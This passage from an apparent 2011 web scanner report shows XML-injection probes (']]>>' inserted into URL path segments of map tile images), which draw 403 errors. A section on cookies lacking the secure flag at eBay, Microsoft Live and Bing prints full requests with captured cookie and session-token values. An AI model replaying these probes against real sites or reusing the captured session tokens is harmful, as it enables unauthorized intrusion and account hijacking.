<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3474F07377C16569</RequestId><HostId>9nPw0G9HE+3Lvc5tgBcchmCSpVMA7oF7xvWxe6FnlYl+pgRVy8
...[SNIP]...

8.262. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 75A5D03E8E39A89F
x-amz-id-2: gWEYq7baJjlyJ2STxxgY4b2ghyrCwcm1YYHxy0YtyzoAygLeI6hxvssqHghjIZX8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 21009087d2f36971d78ee81d69a531dab1c7ccfac30e602a283b4a98e2336c8edd97eec105e84ebe
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>75A5D03E8E39A89F</RequestId><HostId>gWEYq7baJjlyJ2STxxgY4b2ghyrCwcm1YYHxy0YtyzoAygLeI6
...[SNIP]...

8.263. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F57D73D99E37C7ED
x-amz-id-2: rkpOJn4RJ2EQGgBETjja1eHf/397Rko11Jcm+zTdEzN2tvBXIkImjRNwe2Qm6NLt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 82dd33f8553ab2cf33fc46ce703cf187671436cc202c98bc06df7383b9f0cdca79ab2934923ab0ca
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F57D73D99E37C7ED</RequestId><HostId>rkpOJn4RJ2EQGgBETjja1eHf/397Rko11Jcm+zTdEzN2tvBXIk
...[SNIP]...

8.264. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9B004E07FB310A91
x-amz-id-2: bkFe2uI1o4Pxsad2XuYpxboY5UskQJFlNE4q3BhxaWFvWEcWKql8zK9LPMflyC2x
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 514c81df6f28c1f877bf37f387df04fe4eaf1a6b51bf8630e9e44919ddfac3cc9dd274342ff0a5db
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9B004E07FB310A91</RequestId><HostId>bkFe2uI1o4Pxsad2XuYpxboY5UskQJFlNE4q3BhxaWFvWEcWKq
...[SNIP]...

8.265. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A58037948FD9DD6D
x-amz-id-2: aftqLOE6VbZcL1RBJGebjA3lhAi4w6Hrh7DDDcXIPNVgBs7BE01Sy2nnbD6+zuxh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cc01ad580ee21148ad75ab6aa837a3fc35a4eba1b283d92a6102222d5d6b36072a43f3785a63dde9
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A58037948FD9DD6D</RequestId><HostId>aftqLOE6VbZcL1RBJGebjA3lhAi4w6Hrh7DDDcXIPNVgBs7BE0
...[SNIP]...

8.266. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0F5352B35D9031CA
x-amz-id-2: m/wWJ5K/V60GYqtrf7esvraOuc9Od26z6Ru34aB9fIWWVMhGWUudDwtaP4NbmkHB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:59 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 95dea8e3f337c1d78e1bd0bc97c9d909be2ac33d1a6264a06e1403038125a8cac5f52df11a503cd4
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0F5352B35D9031CA</RequestId><HostId>m/wWJ5K/V60GYqtrf7esvraOuc9Od26z6Ru34aB9fIWWVMhGWU
...[SNIP]...

8.267. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 5] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0F0F70B0B3D947FB
x-amz-id-2: nORg1/MB8xEFBHYWrFum7MtYa23Kp9LjA3SrW21ujl6Y0TluhtuO21qfQNaz4PIn
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:03 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2111c375839d38d964ce940e40dde2888b9b7a4ed2b78c6f4ad5266e018de263ec30eec0046f073d
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0F0F70B0B3D947FB</RequestId><HostId>nORg1/MB8xEFBHYWrFum7MtYa23Kp9LjA3SrW21ujl6Y0Tluht
...[SNIP]...

8.268. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 6] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 224F669F053A60DF
x-amz-id-2: guKmpan/15AQ97CmPWKnj7EIHCax7W/7jR7/hfs3k4p/4+Ge9ZxT25ZKayMq69Bk
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:08 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ce94c36f5e99fbf3a93c5894eaf794251a47e279f7b091b7d330436b0385399b9b58aac992bbfd91
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>224F669F053A60DF</RequestId><HostId>guKmpan/15AQ97CmPWKnj7EIHCax7W/7jR7/hfs3k4p/4+Ge9Z
...[SNIP]...

8.269. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 7] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://maps.f6img.com
Path:	/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EA07B7DD344114BA
x-amz-id-2: Msf94quOGgLw0PtHd0YF6xjDm0ynBmXdMgZKWxaSgQt3rECTgeVjbWC+/N/XczH5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:11 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 318863759bd8d9b4ac1dc355e4ad5c8ecac42d0e4a49645c79403ad3b56a34ea2ab948ae55708e51
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EA07B7DD344114BA</RequestId><HostId>Msf94quOGgLw0PtHd0YF6xjDm0ynBmXdMgZKWxaSgQt3rECTge
...[SNIP]...

9. SSL cookie without secure flag set previous next
There are 6 instances of this issue:

https://signin.ebay.com/ws/eBayISAPI.dll
https://support.discoverbing.com/LTS/default.aspx
https://login.live.com/login.srf
https://ssl.bing.com/travel/secure/account/overview
https://support.discoverbing.com/Default.aspx
https://support.microsoft.com/oas/default.aspx

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

9.1. https://signin.ebay.com/ws/eBayISAPI.dll previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://signin.ebay.com
Path:	/ws/eBayISAPI.dll

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

9.2. https://support.discoverbing.com/LTS/default.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://support.discoverbing.com
Path:	/LTS/default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

GsfxSessionCookie=44234530295139662; domain=.microsoft.com; path=/
MC1=GUID=2ba8c043c3ce4713ae02820ed49cd1d7&HASH=2ba8&LV=20117&V=3; domain=.microsoft.com; expires=Mon, 19-Jul-2021 15:18:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LTS/default.aspx?SSID=15&MSID=b3669c96-3886-4430-9363-3e7a37fa4b8a&SiteLCID=1033&RefURL=http%3a%2f%2fonlinehelp.microsoft.com%2fen-us%2fbing%2fff808415.aspx&ContentType=DM&EventCollectionID=1&FlexId=12&FlexValue4=mozilla%2f5.0%20(windows%20nt%206.1%3b%20wow64)%20applewebkit%2f534.30%20(khtml%2c%20like%20gecko)%20chrome%2f12.0.742.122%20safari%2f534.30&FlexValue1=bing&FlexValue2=global_support_oasp&FlexValue3=&FlexValue5=&PassportStatus=0&URL=https%3a%2f%2fsupport.discoverbing.com%2fDefault.aspx%3f%26st%3d1%26wfxredirect%3d1&ContentId=global_support_oasp HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: https://support.discoverbing.com/Default.aspx?&st=1&wfxredirect=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; scrx=1; MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; AuthKey=oss_bing; WFXLANG=en-us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Jul 2011 15:18:15 GMT
Pragma: no-cache
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: GsfxSessionCookie=44234530295139662; domain=.microsoft.com; path=/
Set-Cookie: MC1=GUID=2ba8c043c3ce4713ae02820ed49cd1d7&HASH=2ba8&LV=20117&V=3; domain=.microsoft.com; expires=Mon, 19-Jul-2021 15:18:15 GMT; path=/
Set-Cookie: GsfxStatsLog=true; domain=.microsoft.com; path=/
Vary: Accept-Encoding
Content-Length: 43

GIF89a.............!.......,...........D..;

9.3. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1311089882&co=1&id=273572; path=/;version=1
MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3$uuid-1895cee1-27dd-48d7-8aac-abac4dc44583$uuid-893a9771-4ec1-49d2-b1d0-11979f88bfa5; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089470&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install-player/mp3-conversion/efa762b3-d6d3-478f-9a59-1cd7414b0374
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; wlidperf=throughput=2&latency=1306; MSPRequ=lt=1311089374&co=1&id=273572; MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3

Response

9.4. https://ssl.bing.com/travel/secure/account/overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl.bing.com
Path:	/travel/secure/account/overview

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_HOP=I=2&TS=1311118711; domain=.bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel/secure/account/overview?FORM=TRGRMR HTTP/1.1
Host: ssl.bing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=318; JSESSIONID=E9781CDFFAE578D97F1CEE56FE6B125F; ETID=BCID-z62stftdmjtffpyz5v577d2o9v13o_VID-2a4fcb0ot2i3byz5nk9raqul1bf3_UID-; s_cc=true; s_sq=%5B%5BB%5D%5D; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; SRCHUID=V=2&GUID=7F073A8D66F24C72BB90F3E48AA61B8A; _msaId=d8678782_61_15534038; _FP=; MUID=E361C23374E642C998D8ABA7166A75EC; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO; _SS=SID=2FF6BBE251234F40B4038D899CDFDA5D&hIm=796; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, no-store, max-age=0
Content-Length: 0
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311118711&rver=6.1.6195.0&wp=LBI&wreply=https:%2F%2Fssl.bing.com%2Fsecure%2Fpassport.aspx%3Frequrl%3Dhttp%253A%252F%252Fssl.bing.com%252Ftravel%252Fsecure%252Faccount%252Foverview%253FFORM%253DTRGRMR%2526wlidtobt&lc=1033&id=264960
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 23:38:32 GMT
Connection: keep-alive
Set-Cookie: _HOP=I=2&TS=1311118711; domain=.bing.com; path=/

9.5. https://support.discoverbing.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.discoverbing.com
Path:	/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

